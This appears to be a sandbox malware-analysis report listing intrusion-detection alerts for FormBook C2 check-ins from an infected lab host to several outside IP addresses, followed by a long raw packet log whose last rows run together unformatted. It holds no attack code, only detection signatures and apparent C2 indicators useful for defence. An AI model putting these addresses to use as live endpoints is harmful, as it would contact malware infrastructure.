English | Great Britain | (map image not included)
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-13T09:34:24.097632+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49984 | 172.65.235.97 | 80 | TCP
2025-01-13T09:34:24.097632+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49984 | 172.65.235.97 | 80 | TCP
2025-01-13T09:34:39.665187+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49988 | 192.64.119.109 | 80 | TCP
2025-01-13T09:34:42.204787+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49989 | 192.64.119.109 | 80 | TCP
2025-01-13T09:34:44.760919+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49990 | 192.64.119.109 | 80 | TCP
2025-01-13T09:34:47.304477+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49991 | 192.64.119.109 | 80 | TCP
2025-01-13T09:34:47.304477+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49991 | 192.64.119.109 | 80 | TCP
2025-01-13T09:34:53.467199+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49992 | 188.114.96.3 | 80 | TCP
2025-01-13T09:34:55.999758+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49993 | 188.114.96.3 | 80 | TCP
2025-01-13T09:34:59.627388+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49994 | 188.114.96.3 | 80 | TCP
2025-01-13T09:35:02.158009+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49996 | 188.114.96.3 | 80 | TCP
2025-01-13T09:35:02.158009+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49996 | 188.114.96.3 | 80 | TCP
2025-01-13T09:35:08.890663+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49997 | 47.83.1.90 | 80 | TCP
2025-01-13T09:35:11.437644+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49998 | 47.83.1.90 | 80 | TCP
2025-01-13T09:35:13.984667+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49999 | 47.83.1.90 | 80 | TCP
2025-01-13T09:35:16.629412+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50000 | 47.83.1.90 | 80 | TCP
2025-01-13T09:35:16.629412+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50000 | 47.83.1.90 | 80 | TCP
2025-01-13T09:35:38.388391+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50002 | 162.0.236.169 | 80 | TCP
2025-01-13T09:35:40.969633+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50003 | 162.0.236.169 | 80 | TCP
2025-01-13T09:35:43.514733+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50004 | 162.0.236.169 | 80 | TCP
2025-01-13T09:35:46.127444+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50005 | 162.0.236.169 | 80 | TCP
2025-01-13T09:35:46.127444+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50005 | 162.0.236.169 | 80 | TCP
2025-01-13T09:35:52.390025+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50006 | 192.186.58.31 | 80 | TCP
2025-01-13T09:35:54.999329+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50007 | 192.186.58.31 | 80 | TCP
2025-01-13T09:35:57.536619+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50008 | 192.186.58.31 | 80 | TCP
2025-01-13T09:36:00.142014+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50009 | 192.186.58.31 | 80 | TCP
2025-01-13T09:36:00.142014+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50009 | 192.186.58.31 | 80 | TCP
2025-01-13T09:36:07.298525+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50010 | 104.21.16.1 | 80 | TCP
2025-01-13T09:36:09.839688+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50011 | 104.21.16.1 | 80 | TCP
2025-01-13T09:36:12.416985+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50012 | 104.21.16.1 | 80 | TCP
2025-01-13T09:36:14.943423+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50013 | 104.21.16.1 | 80 | TCP
2025-01-13T09:36:14.943423+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50013 | 104.21.16.1 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 13, 2025 09:34:23.205662012 CET | 49984 | 80 | 192.168.2.6 | 172.65.235.97
Jan 13, 2025 09:34:23.210530996 CET | 80 | 49984 | 172.65.235.97 | 192.168.2.6
Jan 13, 2025 09:34:23.210807085 CET | 49984 | 80 | 192.168.2.6 | 172.65.235.97
Jan 13, 2025 09:34:23.221297979 CET | 49984 | 80 | 192.168.2.6 | 172.65.235.97
Jan 13, 2025 09:34:23.226130962 CET | 80 | 49984 | 172.65.235.97 | 192.168.2.6
Jan 13, 2025 09:34:24.093806028 CET | 80 | 49984 | 172.65.235.97 | 192.168.2.6
Jan 13, 2025 09:34:24.095870972 CET | 80 | 49984 | 172.65.235.97 | 192.168.2.6
Jan 13, 2025 09:34:24.097631931 CET | 49984 | 80 | 192.168.2.6 | 172.65.235.97
Jan 13, 2025 09:34:24.099517107 CET | 49984 | 80 | 192.168.2.6 | 172.65.235.97
Jan 13, 2025 09:34:24.104343891 CET | 80 | 49984 | 172.65.235.97 | 192.168.2.6
Jan 13, 2025 09:34:39.172652006 CET | 49988 | 80 | 192.168.2.6 | 192.64.119.109
Jan 13, 2025 09:34:39.177464962 CET | 80 | 49988 | 192.64.119.109 | 192.168.2.6
Jan 13, 2025 09:34:39.177561998 CET | 49988 | 80 | 192.168.2.6 | 192.64.119.109
Jan 13, 2025 09:34:39.194005966 CET | 49988 | 80 | 192.168.2.6 | 192.64.119.109
Jan 13, 2025 09:34:39.198784113 CET | 80 | 49988 | 192.64.119.109 | 192.168.2.6
Jan 13, 2025 09:34:39.665046930 CET | 80 | 49988 | 192.64.119.109 | 192.168.2.6
Jan 13, 2025 09:34:39.665076017 CET | 80 | 49988 | 192.64.119.109 | 192.168.2.6
Jan 13, 2025 09:34:39.665186882 CET | 49988 | 80 | 192.168.2.6 | 192.64.119.109
Jan 13, 2025 09:34:40.703346968 CET | 49988 | 80 | 192.168.2.6 | 192.64.119.109
Jan 13, 2025 09:34:41.722330093 CET | 49989 | 80 | 192.168.2.6 | 192.64.119.109
Jan 13, 2025 09:34:41.727372885 CET | 80 | 49989 | 192.64.119.109 | 192.168.2.6
Jan 13, 2025 09:34:41.727536917 CET | 49989 | 80 | 192.168.2.6 | 192.64.119.109
Jan 13, 2025 09:34:41.743571043 CET | 49989 | 80 | 192.168.2.6 | 192.64.119.109
Jan 13, 2025 09:34:41.748466969 CET | 80 | 49989 | 192.64.119.109 | 192.168.2.6
Jan 13, 2025 09:34:42.204600096 CET | 80 | 49989 | 192.64.119.109 | 192.168.2.6
Jan 13, 2025 09:34:42.204663038 CET | 80 | 49989 | 192.64.119.109 | 192.168.2.6
Jan 13, 2025 09:34:42.204787016 CET | 49989 | 80 | 192.168.2.6 | 192.64.119.109
Jan 13, 2025 09:34:43.250236034 CET | 49989 | 80 | 192.168.2.6 | 192.64.119.109
Jan 13, 2025 09:34:44.269126892 CET | 49990 | 80 | 192.168.2.6 | 192.64.119.109
Jan 13, 2025 09:34:44.274029970 CET | 80 | 49990 | 192.64.119.109 | 192.168.2.6
Jan 13, 2025 09:34:44.274153948 CET | 49990 | 80 | 192.168.2.6 | 192.64.119.109
Jan 13, 2025 09:34:44.289352894 CET | 49990 | 80 | 192.168.2.6 | 192.64.119.109
Jan 13, 2025 09:34:44.294329882 CET | 80 | 49990 | 192.64.119.109 | 192.168.2.6
Jan 13, 2025 09:34:44.294368982 CET | 80 | 49990 | 192.64.119.109 | 192.168.2.6
Jan 13, 2025 09:34:44.760562897 CET | 80 | 49990 | 192.64.119.109 | 192.168.2.6
Jan 13, 2025 09:34:44.760746002 CET | 80 | 49990 | 192.64.119.109 | 192.168.2.6
Jan 13, 2025 09:34:44.760919094 CET | 49990 | 80 | 192.168.2.6 | 192.64.119.109
Jan 13, 2025 09:34:45.797034025 CET | 49990 | 80 | 192.168.2.6 | 192.64.119.109
Jan 13, 2025 09:34:46.815944910 CET | 49991 | 80 | 192.168.2.6 | 192.64.119.109
Jan 13, 2025 09:34:46.820964098 CET | 80 | 49991 | 192.64.119.109 | 192.168.2.6
Jan 13, 2025 09:34:46.821116924 CET | 49991 | 80 | 192.168.2.6 | 192.64.119.109
Jan 13, 2025 09:34:46.830308914 CET | 49991 | 80 | 192.168.2.6 | 192.64.119.109
Jan 13, 2025 09:34:46.835129023 CET | 80 | 49991 | 192.64.119.109 | 192.168.2.6
Jan 13, 2025 09:34:47.303967953 CET | 80 | 49991 | 192.64.119.109 | 192.168.2.6
Jan 13, 2025 09:34:47.304228067 CET | 80 | 49991 | 192.64.119.109 | 192.168.2.6
Jan 13, 2025 09:34:47.304476976 CET | 49991 | 80 | 192.168.2.6 | 192.64.119.109
Jan 13, 2025 09:34:47.307622910 CET | 49991 | 80 | 192.168.2.6 | 192.64.119.109
Jan 13, 2025 09:34:47.312531948 CET | 80 | 49991 | 192.64.119.109 | 192.168.2.6
Jan 13, 2025 09:34:52.332149029 CET | 49992 | 80 | 192.168.2.6 | 188.114.96.3
Jan 13, 2025 09:34:52.337012053 CET | 80 | 49992 | 188.114.96.3 | 192.168.2.6
Jan 13, 2025 09:34:52.337110043 CET | 49992 | 80 | 192.168.2.6 | 188.114.96.3
Jan 13, 2025 09:34:52.357657909 CET | 49992 | 80 | 192.168.2.6 | 188.114.96.3
Jan 13, 2025 09:34:52.362514019 CET | 80 | 49992 | 188.114.96.3 | 192.168.2.6
Jan 13, 2025 09:34:53.467041969 CET | 80 | 49992 | 188.114.96.3 | 192.168.2.6
Jan 13, 2025 09:34:53.467108011 CET | 80 | 49992 | 188.114.96.3 | 192.168.2.6
Jan 13, 2025 09:34:53.467199087 CET | 49992 | 80 | 192.168.2.6 | 188.114.96.3
Jan 13, 2025 09:34:53.467374086 CET | 80 | 49992 | 188.114.96.3 | 192.168.2.6
Jan 13, 2025 09:34:53.467430115 CET | 49992 | 80 | 192.168.2.6 | 188.114.96.3
Jan 13, 2025 09:34:53.860434055 CET | 49992 | 80 | 192.168.2.6 | 188.114.96.3
Jan 13, 2025 09:34:54.878520012 CET | 49993 | 80 | 192.168.2.6 | 188.114.96.3
Jan 13, 2025 09:34:54.883383036 CET | 80 | 49993 | 188.114.96.3 | 192.168.2.6
Jan 13, 2025 09:34:54.883508921 CET | 49993 | 80 | 192.168.2.6 | 188.114.96.3
Jan 13, 2025 09:34:54.899080038 CET | 49993 | 80 | 192.168.2.6 | 188.114.96.3
Jan 13, 2025 09:34:54.903907061 CET | 80 | 49993 | 188.114.96.3 | 192.168.2.6
Jan 13, 2025 09:34:55.999488115 CET | 80 | 49993 | 188.114.96.3 | 192.168.2.6
Jan 13, 2025 09:34:55.999533892 CET | 80 | 49993 | 188.114.96.3 | 192.168.2.6
Jan 13, 2025 09:34:55.999758005 CET | 49993 | 80 | 192.168.2.6 | 188.114.96.3
Jan 13, 2025 09:34:56.000134945 CET | 80 | 49993 | 188.114.96.3 | 192.168.2.6
Jan 13, 2025 09:34:56.000201941 CET | 49993 | 80 | 192.168.2.6 | 188.114.96.3
Jan 13, 2025 09:34:56.409543991 CET | 49993 | 80 | 192.168.2.6 | 188.114.96.3
Jan 13, 2025 09:34:57.430490971 CET | 49994 | 80 | 192.168.2.6 | 188.114.96.3
Jan 13, 2025 09:34:58.437393904 CET | 49994 | 80 | 192.168.2.6 | 188.114.96.3
Jan 13, 2025 09:34:58.454576015 CET | 80 | 49994 | 188.114.96.3 | 192.168.2.6
Jan 13, 2025 09:34:58.454622984 CET | 80 | 49994 | 188.114.96.3 | 192.168.2.6
Jan 13, 2025 09:34:58.454730034 CET | 49994 | 80 | 192.168.2.6 | 188.114.96.3
Jan 13, 2025 09:34:58.454760075 CET | 49994 | 80 | 192.168.2.6 | 188.114.96.3
Jan 13, 2025 09:34:58.471421957 CET | 49994 | 80 | 192.168.2.6 | 188.114.96.3
Jan 13, 2025 09:34:58.476391077 CET | 80 | 49994 | 188.114.96.3 | 192.168.2.6
Jan 13, 2025 09:34:58.476458073 CET | 80 | 49994 | 188.114.96.3 | 192.168.2.6
Jan 13, 2025 09:34:59.627232075 CET | 80 | 49994 | 188.114.96.3 | 192.168.2.6
Jan 13, 2025 09:34:59.627259970 CET | 80 | 49994 | 188.114.96.3 | 192.168.2.6
Jan 13, 2025 09:34:59.627388000 CET | 49994 | 80 | 192.168.2.6 | 188.114.96.3
Jan 13, 2025 09:34:59.627757072 CET | 80 | 49994 | 188.114.96.3 | 192.168.2.6
Jan 13, 2025 09:34:59.627813101 CET | 49994 | 80 | 192.168.2.6 | 188.114.96.3
Jan 13, 2025 09:34:59.984396935 CET | 49994 | 80 | 192.168.2.6 | 188.114.96.3
Jan 13, 2025 09:35:01.004471064 CET | 49996 | 80 | 192.168.2.6 | 188.114.96.3
Jan 13, 2025 09:35:01.009522915 CET | 80 | 49996 | 188.114.96.3 | 192.168.2.6
Jan 13, 2025 09:35:01.009664059 CET | 49996 | 80 | 192.168.2.6 | 188.114.96.3
Jan 13, 2025 09:35:01.020791054 CET | 49996 | 80 | 192.168.2.6 | 188.114.96.3
Jan 13, 2025 09:35:01.025648117 CET | 80 | 49996 | 188.114.96.3 | 192.168.2.6
Jan 13, 2025 09:35:02.157812119 CET | 80 | 49996 | 188.114.96.3 | 192.168.2.6
Jan 13, 2025 09:35:02.157833099 CET | 80 | 49996 | 188.114.96.3 | 192.168.2.6
Jan 13, 2025 09:35:02.157847881 CET | 80 | 49996 | 188.114.96.3 | 192.168.2.6
Jan 13, 2025 09:35:02.158009052 CET | 49996 | 80 | 192.168.2.6 | 188.114.96.3
Jan 13, 2025 09:35:02.161855936 CET | 49996 | 80 | 192.168.2.6 | 188.114.96.3
Jan 13, 2025 09:35:02.166690111 CET | 80 | 49996 | 188.114.96.3 | 192.168.2.6
Jan 13, 2025 09:35:07.355765104 CET | 49997 | 80 | 192.168.2.6 | 47.83.1.90
Jan 13, 2025 09:35:07.360676050 CET | 80 | 49997 | 47.83.1.90 | 192.168.2.6
Jan 13, 2025 09:35:07.360821962 CET | 49997 | 80 | 192.168.2.6 | 47.83.1.90
Jan 13, 2025 09:35:07.382155895 CET | 49997 | 80 | 192.168.2.6 | 47.83.1.90
Jan 13, 2025 09:35:07.387068987 CET | 80 | 49997 | 47.83.1.90 | 192.168.2.6
Jan 13, 2025 09:35:08.890662909 CET | 49997 | 80 | 192.168.2.6 | 47.83.1.90
Jan 13, 2025 09:35:08.900254011 CET | 80 | 49997 | 47.83.1.90 | 192.168.2.6
Jan 13, 2025 09:35:08.900367975 CET | 49997 | 80 | 192.168.2.6 | 47.83.1.90
Jan 13, 2025 09:35:09.910701036 CET | 49998 | 80 | 192.168.2.6 | 47.83.1.90
Jan 13, 2025 09:35:09.915558100 CET | 80 | 49998 | 47.83.1.90 | 192.168.2.6
Jan 13, 2025 09:35:09.915709972 CET | 49998 | 80 | 192.168.2.6 | 47.83.1.90
Jan 13, 2025 09:35:09.932131052 CET | 49998 | 80 | 192.168.2.6 | 47.83.1.90
Jan 13, 2025 09:35:09.936976910 CET | 80 | 49998 | 47.83.1.90 | 192.168.2.6
Jan 13, 2025 09:35:11.437644005 CET | 49998 | 80 | 192.168.2.6 | 47.83.1.90
Jan 13, 2025 09:35:11.442627907 CET | 80 | 49998 | 47.83.1.90 | 192.168.2.6
Jan 13, 2025 09:35:11.443340063 CET | 49998 | 80 | 192.168.2.6 | 47.83.1.90
Jan 13, 2025 09:35:12.456332922 CET | 49999 | 80 | 192.168.2.6 | 47.83.1.90
Jan 13, 2025 09:35:12.461230993 CET | 80 | 49999 | 47.83.1.90 | 192.168.2.6
Jan 13, 2025 09:35:12.461345911 CET | 49999 | 80 | 192.168.2.6 | 47.83.1.90
Jan 13, 2025 09:35:12.475527048 CET | 49999 | 80 | 192.168.2.6 | 47.83.1.90
Jan 13, 2025 09:35:12.480453014 CET | 80 | 49999 | 47.83.1.90 | 192.168.2.6
Jan 13, 2025 09:35:12.480475903 CET | 80 | 49999 | 47.83.1.90 | 192.168.2.6
Jan 13, 2025 09:35:13.984667063 CET | 49999 | 80 | 192.168.2.6 | 47.83.1.90
Jan 13, 2025 09:35:13.989829063 CET | 80 | 49999 | 47.83.1.90 | 192.168.2.6
Jan 13, 2025 09:35:13.989926100 CET | 49999 | 80 | 192.168.2.6 | 47.83.1.90
Jan 13, 2025 09:35:15.004407883 CET | 50000 | 80 | 192.168.2.6 | 47.83.1.90
Jan 13, 2025 09:35:15.010694027 CET | 80 | 50000 | 47.83.1.90 | 192.168.2.6
Jan 13, 2025 09:35:15.010771990 CET | 50000 | 80 | 192.168.2.6 | 47.83.1.90
Jan 13, 2025 09:35:15.023931026 CET | 50000 | 80 | 192.168.2.6 | 47.83.1.90
Jan 13, 2025 09:35:15.029650927 CET | 80 | 50000 | 47.83.1.90 | 192.168.2.6
Jan 13, 2025 09:35:16.629235029 CET | 80 | 50000 | 47.83.1.90 | 192.168.2.6
Jan 13, 2025 09:35:16.629261971 CET | 80 | 50000 | 47.83.1.90 | 192.168.2.6
Jan 13, 2025 09:35:16.629411936 CET | 50000 | 80 | 192.168.2.6 | 47.83.1.90
Jan 13, 2025 09:35:16.631953001 CET | 50000 | 80 | 192.168.2.6 | 47.83.1.90
Jan 13, 2025 09:35:16.636750937 CET | 80 | 50000 | 47.83.1.90 | 192.168.2.6
Jan 13, 2025 09:35:37.787398100 CET | 50002 | 80 | 192.168.2.6 | 162.0.236.169
Jan 13, 2025 09:35:37.792373896 CET | 80 | 50002 | 162.0.236.169 | 192.168.2.6
Jan 13, 2025 09:35:37.792481899 CET | 50002 | 80 | 192.168.2.6 | 162.0.236.169
Jan 13, 2025 09:35:37.807696104 CET | 50002 | 80 | 192.168.2.6 | 162.0.236.169
Jan 13, 2025 09:35:37.812616110 CET | 80 | 50002 | 162.0.236.169 | 192.168.2.6
Jan 13, 2025 09:35:38.388261080 CET | 80 | 50002 | 162.0.236.169 | 192.168.2.6
Jan 13, 2025 09:35:38.388326883 CET | 80 | 50002 | 162.0.236.169 | 192.168.2.6
Jan 13, 2025 09:35:38.388391018 CET | 50002 | 80 | 192.168.2.6 | 162.0.236.169
Jan 13, 2025 09:35:39.312315941 CET | 50002 | 80 | 192.168.2.6 | 162.0.236.169
Jan 13, 2025 09:35:40.331525087 CET | 50003 | 80 | 192.168.2.6 | 162.0.236.169
Jan 13, 2025 09:35:40.360564947 CET | 80 | 50003 | 162.0.236.169 | 192.168.2.6
Jan 13, 2025 09:35:40.360732079 CET | 50003 | 80 | 192.168.2.6 | 162.0.236.169
Jan 13, 2025 09:35:40.375359058 CET | 50003 | 80 | 192.168.2.6 | 162.0.236.169
Jan 13, 2025 09:35:40.380204916 CET | 80 | 50003 | 162.0.236.169 | 192.168.2.6
Jan 13, 2025 09:35:40.969507933 CET | 80 | 50003 | 162.0.236.169 | 192.168.2.6
Jan 13, 2025 09:35:40.969541073 CET | 80 | 50003 | 162.0.236.169 | 192.168.2.6
Jan 13, 2025 09:35:40.969633102 CET | 50003 | 80 | 192.168.2.6 | 162.0.236.169
Jan 13, 2025 09:35:41.892401934 CET | 50003 | 80 | 192.168.2.6 | 162.0.236.169
Jan 13, 2025 09:35:42.909390926 CET | 50004 | 80 | 192.168.2.6 | 162.0.236.169
Jan 13, 2025 09:35:42.914371967 CET | 80 | 50004 | 162.0.236.169 | 192.168.2.6
Jan 13, 2025 09:35:42.914485931 CET | 50004 | 80 | 192.168.2.6 | 162.0.236.169
Jan 13, 2025 09:35:42.926531076 CET | 50004 | 80 | 192.168.2.6 | 162.0.236.169
Jan 13, 2025 09:35:42.931396008 CET | 80 | 50004 | 162.0.236.169 | 192.168.2.6
Jan 13, 2025 09:35:42.931525946 CET | 80 | 50004 | 162.0.236.169 | 192.168.2.6
Jan 13, 2025 09:35:43.514452934 CET | 80 | 50004 | 162.0.236.169 | 192.168.2.6
Jan 13, 2025 09:35:43.514668941 CET | 80 | 50004 | 162.0.236.169 | 192.168.2.6
Jan 13, 2025 09:35:43.514733076 CET | 50004 | 80 | 192.168.2.6 | 162.0.236.169
Jan 13, 2025 09:35:44.437402964 CET | 50004 | 80 | 192.168.2.6 | 162.0.236.169
Jan 13, 2025 09:35:45.456078053 CET | 50005 | 80 | 192.168.2.6 | 162.0.236.169
Jan 13, 2025 09:35:45.539423943 CET | 80 | 50005 | 162.0.236.169 | 192.168.2.6
Jan 13, 2025 09:35:45.539681911 CET | 50005 | 80 | 192.168.2.6 | 162.0.236.169
Jan 13, 2025 09:35:45.548999071 CET | 50005 | 80 | 192.168.2.6 | 162.0.236.169
Jan 13, 2025 09:35:45.553847075 CET | 80 | 50005 | 162.0.236.169 | 192.168.2.6
Jan 13, 2025 09:35:46.127190113 CET | 80 | 50005 | 162.0.236.169 | 192.168.2.6
Jan 13, 2025 09:35:46.127326965 CET | 80 | 50005 | 162.0.236.169 | 192.168.2.6
Jan 13, 2025 09:35:46.127444029 CET | 50005 | 80 | 192.168.2.6 | 162.0.236.169
Jan 13, 2025 09:35:46.130130053 CET | 50005 | 80 | 192.168.2.6 | 162.0.236.169
Jan 13, 2025 09:35:46.134906054 CET | 80 | 50005 | 162.0.236.169 | 192.168.2.6
Jan 13, 2025 09:35:51.496648073 CET | 50006 | 80 | 192.168.2.6 | 192.186.58.31
Jan 13, 2025 09:35:51.501511097 CET | 80 | 50006 | 192.186.58.31 | 192.168.2.6
Jan 13, 2025 09:35:51.501641035 CET | 50006 | 80 | 192.168.2.6 | 192.186.58.31
Jan 13, 2025 09:35:51.520896912 CET | 50006 | 80 | 192.168.2.6 | 192.186.58.31
Jan 13, 2025 09:35:51.525835991 CET | 80 | 50006 | 192.186.58.31 | 192.168.2.6
Jan 13, 2025 09:35:52.389759064 CET | 80 | 50006 | 192.186.58.31 | 192.168.2.6
Jan 13, 2025 09:35:52.389784098 CET | 80 | 50006 | 192.186.58.31 | 192.168.2.6
Jan 13, 2025 09:35:52.390024900 CET | 50006 | 80 | 192.168.2.6 | 192.186.58.31
Jan 13, 2025 09:35:53.031141996 CET | 50006 | 80 | 192.168.2.6 | 192.186.58.31
Jan 13, 2025 09:35:54.050096035 CET | 50007 | 80 | 192.168.2.6 | 192.186.58.31
Jan 13, 2025 09:35:54.054980040 CET | 80 | 50007 | 192.186.58.31 | 192.168.2.6
Jan 13, 2025 09:35:54.055087090 CET | 50007 | 80 | 192.168.2.6 | 192.186.58.31
Jan 13, 2025 09:35:54.070956945 CET | 50007 | 80 | 192.168.2.6 | 192.186.58.31
Jan 13, 2025 09:35:54.075766087 CET | 80 | 50007 | 192.186.58.31 | 192.168.2.6
Jan 13, 2025 09:35:54.999159098 CET | 80 | 50007 | 192.186.58.31 | 192.168.2.6
Jan 13, 2025 09:35:54.999265909 CET | 80 | 50007 | 192.186.58.31 | 192.168.2.6
Jan 13, 2025 09:35:54.999329090 CET | 50007 | 80 | 192.168.2.6 | 192.186.58.31
Jan 13, 2025 09:35:55.577883005 CET | 50007 | 80 | 192.168.2.6 | 192.186.58.31
Jan 13, 2025 09:35:56.596518993 CET | 50008 | 80 | 192.168.2.6 | 192.186.58.31
Jan 13, 2025 09:35:56.601629019 CET | 80 | 50008 | 192.186.58.31 | 192.168.2.6
Jan 13, 2025 09:35:56.601757050 CET | 50008 | 80 | 192.168.2.6 | 192.186.58.31
Jan 13, 2025 09:35:56.616311073 CET | 50008 | 80 | 192.168.2.6 | 192.186.58.31
Jan 13, 2025 09:35:56.621180058 CET | 80 | 50008 | 192.186.58.31 | 192.168.2.6
Jan 13, 2025 09:35:56.621263981 CET | 80 | 50008 | 192.186.58.31 | 192.168.2.6
Jan 13, 2025 09:35:57.536473989 CET | 80 | 50008 | 192.186.58.31 | 192.168.2.6
Jan 13, 2025 09:35:57.536525011 CET | 80 | 50008 | 192.186.58.31 | 192.168.2.6
Jan 13, 2025 09:35:57.536618948 CET | 50008 | 80 | 192.168.2.6 | 192.186.58.31
Jan 13, 2025 09:35:58.124887943 CET | 50008 | 80 | 192.168.2.6 | 192.186.58.31
Jan 13, 2025 09:35:59.143754959 CET | 50009 | 80 | 192.168.2.6 | 192.186.58.31
Jan 13, 2025 09:35:59.148749113 CET | 80 | 50009 | 192.186.58.31 | 192.168.2.6
Jan 13, 2025 09:35:59.148847103 CET | 50009 | 80 | 192.168.2.6 | 192.186.58.31
Jan 13, 2025 09:35:59.157665014 CET | 50009 | 80 | 192.168.2.6 | 192.186.58.31
Jan 13, 2025 09:35:59.162491083 CET | 80 | 50009 | 192.186.58.31 | 192.168.2.6
Jan 13, 2025 09:36:00.141891956 CET | 80 | 50009 | 192.186.58.31 | 192.168.2.6
Jan 13, 2025 09:36:00.141910076 CET | 80 | 50009 | 192.186.58.31 | 192.168.2.6
Jan 13, 2025 09:36:00.141926050 CET | 80 | 50009 | 192.186.58.31 | 192.168.2.6
Jan 13, 2025 09:36:00.141948938 CET | 80 | 50009 | 192.186.58.31 | 192.168.2.6
Jan 13, 2025 09:36:00.141964912 CET | 80 | 50009 | 192.186.58.31 | 192.168.2.6
Jan 13, 2025 09:36:00.141979933 CET | 80 | 50009 | 192.186.58.31 | 192.168.2.6
Jan 13, 2025 09:36:00.141993046 CET | 80 | 50009 | 192.186.58.31 | 192.168.2.6
Jan 13, 2025 09:36:00.142008066 CET | 80 | 50009 | 192.186.58.31 | 192.168.2.6
Jan 13, 2025 09:36:00.142014027 CET | 50009 | 80 | 192.168.2.6 | 192.186.58.31
                                                    Jan 13, 2025 09:36:00.142024040 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.142039061 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.142124891 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.142158985 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.146886110 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.146902084 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.146917105 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.146982908 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.187199116 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.346566916 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.346587896 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.346616030 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.346628904 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.346756935 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.346770048 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.346802950 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.346834898 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.346854925 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.347183943 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.347210884 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.347224951 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.347240925 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.347255945 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.347299099 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.347353935 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.347353935 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.348058939 CET8050009192.186.58.31192.168.2.6
